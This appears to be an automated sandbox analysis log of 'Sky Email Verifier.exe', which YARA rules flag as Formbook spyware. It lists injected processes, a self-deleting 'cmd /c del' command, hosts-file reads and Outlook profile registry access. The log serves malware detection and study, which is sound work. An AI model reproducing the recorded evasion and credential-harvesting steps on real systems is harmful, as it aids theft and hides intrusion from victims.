          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044E25817_2_044E2581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04572D827_2_04572D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0457D6167_2_0457D616
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044D6E307_2_044D6E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04582EF77_2_04582EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0458DFCE7_2_0458DFCE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04581FF17_2_04581FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_045710027_2_04571002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0458E8247_2_0458E824
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044DA8307_2_044DA830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_045828EC7_2_045828EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044CB0907_2_044CB090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044E20A07_2_044E20A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_045820A87_2_045820A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044BF9007_2_044BF900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044D41207_2_044D4120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044D99BF7_2_044D99BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044DB2367_2_044DB236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0456FA2B7_2_0456FA2B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04574AEF7_2_04574AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_045822AE7_2_045822AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044DAB407_2_044DAB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0455CB4F7_2_0455CB4F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044DA3097_2_044DA309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04582B287_2_04582B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_0457DBD27_2_0457DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_045703DA7_2_045703DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044EABD87_2_044EABD8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_045623E37_2_045623E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044E138B7_2_044E138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_044EEBB07_2_044EEBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02398A3B7_2_02398A3B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02398A407_2_02398A40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023AC2C17_2_023AC2C1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023AABE37_2_023AABE3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023AC7407_2_023AC740
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02392FB07_2_02392FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023AB7947_2_023AB794
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023AC50F7_2_023AC50F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_023ABD057_2_023ABD05
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02392D907_2_02392D90
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeCode function: String function: 0193B150 appears 136 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 044BB150 appears 136 times
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6836 -s 996
          Source: Sky Email Verifier.exeStatic PE information: invalid certificate
          Source: Sky Email Verifier.exe, 00000000.00000002.224997676.0000000004D50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs Sky Email Verifier.exe
          Source: Sky Email Verifier.exe, 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAlienRunPE.dll6 vs Sky Email Verifier.exe
          Source: Sky Email Verifier.exe, 00000000.00000002.222263719.0000000000998000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Sky Email Verifier.exe
          Source: Sky Email Verifier.exe, 00000002.00000002.249988625.00000000014DA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs Sky Email Verifier.exe
          Source: Sky Email Verifier.exe, 00000002.00000002.251021200.0000000001BBF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Sky Email Verifier.exe
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.249408964.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.250036862.0000000001710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.470914868.0000000002390000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.250085386.0000000001740000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.223476201.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.472311143.0000000004290000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.223552024.00000000037BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.472153635.0000000004260000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Sky Email Verifier.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.Sky Email Verifier.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Sky Email Verifier.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Sky Email Verifier.exe, 00000000.00000002.222537926.0000000000A25000.00000004.00000020.sdmpBinary or memory string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: Sky Email Verifier.exe, 00000000.00000002.222613199.0000000000A67000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/4@18/10
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6836
          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER98A1.tmpJump to behavior
          Source: Sky Email Verifier.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Sky Email Verifier.exeVirustotal: Detection: 46%
          Source: Sky Email Verifier.exeReversingLabs: Detection: 31%
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeFile read: C:\Users\user\Desktop\Sky Email Verifier.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Sky Email Verifier.exe 'C:\Users\user\Desktop\Sky Email Verifier.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\Sky Email Verifier.exe C:\Users\user\Desktop\Sky Email Verifier.exe
          Source: unknownProcess created: C:\Users\user\Desktop\Sky Email Verifier.exe C:\Users\user\Desktop\Sky Email Verifier.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6836 -s 996
          Source: unknownProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sky Email Verifier.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeProcess created: C:\Users\user\Desktop\Sky Email Verifier.exe C:\Users\user\Desktop\Sky Email Verifier.exeJump to behavior
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeProcess created: C:\Users\user\Desktop\Sky Email Verifier.exe C:\Users\user\Desktop\Sky Email Verifier.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Sky Email Verifier.exe'Jump to behavior
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\Sky Email Verifier.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Sky Email Verifier.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Sky Email Verifier.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb6U =! source: Sky Email Verifier.exe, 00000000.00000002.222365799.00000000009CE000.00000004.00000020.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Sky Email Verifier.exe, 00000000.00000002.222537926.0000000000A25000